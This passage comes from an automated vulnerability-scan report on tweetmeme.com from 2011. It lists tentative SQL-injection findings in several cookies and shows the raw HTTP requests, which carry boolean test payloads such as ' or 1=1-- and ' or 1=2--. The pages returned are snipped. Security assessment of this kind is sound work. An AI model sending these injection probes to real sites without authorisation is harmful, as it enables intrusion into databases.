User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=94666970'%20or%201%3d1--%20; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0072450637817383
X-Served-In: 0.028326988220215
X-Served-By: h02
Content-Length: 33715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
New
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=7459401286">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=42830250518" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /story/3636556715/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=94666970'%20or%201%3d2--%20; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034580230712891
X-Served-In: 0.030218124389648
X-Served-By: h02
Content-Length: 33725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
New
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=30407187526">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=71437292459" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.43. http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 [tm_identity cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000

Issue detail

The tm_identity cookie appears to be vulnerable to SQL injection attacks. The payloads 32365738'%20or%201%3d1--%20 and 32365738'%20or%201%3d2--%20 were each submitted in the tm_identity cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05632365738'%20or%201%3d1--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0059370994567871
X-Served-In: 1.0348711013794
X-Served-By: ded2062
Content-Length: 41912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Vid
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=95525847187">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=5170608887" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05632365738'%20or%201%3d2--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0051429271697998
X-Served-In: 1.036278963089
X-Served-By: h03
Content-Length: 41922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Vid
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=27425754144">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=85382011911" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.44. http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid [__utmv cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads 19840181'%20or%201%3d1--%20 and 19840181'%20or%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=19840181'%20or%201%3d1--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.011123895645142
X-Served-In: 1.0946009159088
X-Served-By: h04
Content-Length: 41335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Kev
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=74397597485">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=25266362030" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

Request 2

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=19840181'%20or%201%3d2--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042209625244141
X-Served-In: 1.0478310585022
X-Served-By: ded2062
Content-Length: 41325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Kev
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=80487986150">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=9368828565" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking…
</a> - <span class="green">629 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

...[SNIP]...

1.45. http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday [__csv cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday

Issue detail

The __csv cookie appears to be vulnerable to SQL injection attacks. The payloads 65272576'%20or%201%3d1--%20 and 65272576'%20or%201%3d2--%20 were each submitted in the __csv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c65272576'%20or%201%3d1--%20; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037760734558105
X-Served-In: 0.033467054367065
X-Served-By: h02
Content-Length: 51437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Goo
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=technology&width=300&height=250&rand=71206812848">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=58939708341" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834773149/an-open-letter-to-the-smiley-face-following-an-insult" title="An Open Letter to the Smiley Face Following an Insult">

An Open Letter to the Smiley Face Following an Insult
</a> - <span class="green">206 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835745639/windows-phone-7-jailbreak-devs-genuinely-excited-by-microsofts-roadmap-engadget" title="Windows Phone 7 jailbreak devs 'genuinely excited' by Microsoft's roadmap -- Engadget">

Windows Phone 7 jailbreak devs 'genuinely excited' by…
</a> - <span class="green">422 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a
...[SNIP]...

Request 2

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c65272576'%20or%201%3d2--%20; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043599605560303
X-Served-In: 0.033595085144043
X-Served-By: ded2062
Content-Length: 51426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
Goo
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=technology&width=300&height=250&rand=55690960377">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=1211546650" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834773149/an-open-letter-to-the-smiley-face-following-an-insult" title="An Open Letter to the Smiley Face Following an Insult">

An Open Letter to the Smiley Face Following an Insult
</a> - <span class="green">206 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835745639/windows-phone-7-jailbreak-devs-genuinely-excited-by-microsofts-roadmap-engadget" title="Windows Phone 7 jailbreak devs 'genuinely excited' by Microsoft's roadmap -- Engadget">

Windows Phone 7 jailbreak devs 'genuinely excited' by…
</a> - <span class="green">422 Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a h
...[SNIP]...

1.46. http://tweetmeme.com/user/KDthunderup [tm_identity cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tweetmeme.com
Path:	/user/KDthunderup

Issue detail

The tm_identity cookie appears to be vulnerable to SQL injection attacks. The payloads 15946719'%20or%201%3d1--%20 and 15946719'%20or%201%3d2--%20 were each submitted in the tm_identity cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05615946719'%20or%201%3d1--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:54:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026209354400635
X-Served-In: 0.9899480342865
X-Served-By: ded2060
Content-Length: 27951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
   <title>
KDt
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=50530586094">
   </iframe>
</div>    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD•app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=12648635625" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my…
</a> - <span class="green">291 Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

